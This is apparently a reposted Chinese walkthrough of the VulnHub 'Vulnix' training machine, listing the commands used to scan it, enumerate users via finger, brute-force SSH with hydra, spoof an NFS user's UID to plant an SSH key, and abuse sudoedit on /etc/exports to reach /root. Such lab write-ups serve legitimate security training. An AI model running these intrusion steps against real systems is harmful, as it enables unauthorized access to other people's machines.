OSCP难度靶机之HackLAB

admin 2022年5月5日14:37:31评论138 views字数 1088阅读3分37秒阅读模式

虚拟机信息

虚拟机下载地址:https://www.vulnhub.com/entry/hacklab-vulnix,48/

虚拟机简介:破解并通过任何您希望的方式获取隐藏在/root中的奖杯

目标:1个flag

级别:中级

1、主机探测

1、通过netdiscover检测主机IP地址

arp-scan 192.168.207.0/24

OSCP难度靶机之HackLAB

2、服务探测

1、通过nmap进行端口扫描

nmap -A -sS -sV -v -p- 192.168.207.138

查看开放端口

OSCP难度靶机之HackLAB

OSCP难度靶机之HackLAB

OSCP难度靶机之HackLAB

3、渗透测试

3.1 服务渗透

1.测试SSH服务

searchsploit OpenSSH 5

未发现有用信息

OSCP难度靶机之HackLAB

2.测试finger服务

finger @192.168.207.138
finger [email protected]
finger [email protected]

OSCP难度靶机之HackLAB

3.查看NFS服务

showmount -e 192.168.207.138

OSCP难度靶机之HackLAB

4.挂载NFS服务

mount -t nfs 192.168.207.138:/home /tmp

查看挂载文件,无权限访问

OSCP难度靶机之HackLAB

5.SSH账号爆破

hydra -l user -P /usr/share/wordlists/rockyou.txt 192.168.207.138 ssh

OSCP难度靶机之HackLAB

3.2 系统渗透

1.登录主机

ssh [email protected]

OSCP难度靶机之HackLAB

2.查看主机内核版本

uname -a
sudo -l

OSCP难度靶机之HackLAB

3.查看用户信息

OSCP难度靶机之HackLAB

4.挂载目录

mkdir /mnt/vulnix
mount 192.168.207.138:/home/vulnix /mnt/vulnix

OSCP难度靶机之HackLAB

5.创建相同权限用户

useradd -u 2008 vulnix
su vulnix

OSCP难度靶机之HackLAB

5.创建SSH密钥

ssh-keygen

OSCP难度靶机之HackLAB

6.复制内容到/tmp

cp /root/.ssh/id_rsa.pub /opt
chown vulnix:vulnix /opt/id_rsa.pub

OSCP难度靶机之HackLAB

7.切换用户保存密钥

mkdir /mnt/vulnix/.ssh
cat /opt/id_rsa.pub >> /mnt/vulnix/.ssh/authorized_keys

OSCP难度靶机之HackLAB

8.登录账号

ssh [email protected]

OSCP难度靶机之HackLAB

3.2 权限提升

1.查看sudo权限

sudo -l

OSCP难度靶机之HackLAB

2.执行权限命令查看

sudoedit /etc/exports

OSCP难度靶机之HackLAB

添加root目录权限

OSCP难度靶机之HackLAB

3.重启虚拟机并重新挂载

umount /mnt/vulnix
mount 192.168.207.138:/root /mnt/vulnix

OSCP难度靶机之HackLAB

4.查看flag

cd /mnt/vulnix
cat trophy.txt

OSCP难度靶机之HackLAB


原文始发于微信公众号(安全孺子牛):OSCP难度靶机之HackLAB

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年5月5日14:37:31
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   OSCP难度靶机之HackLABhttp://cn-sec.com/archives/974120.html

发表评论

匿名网友 填写信息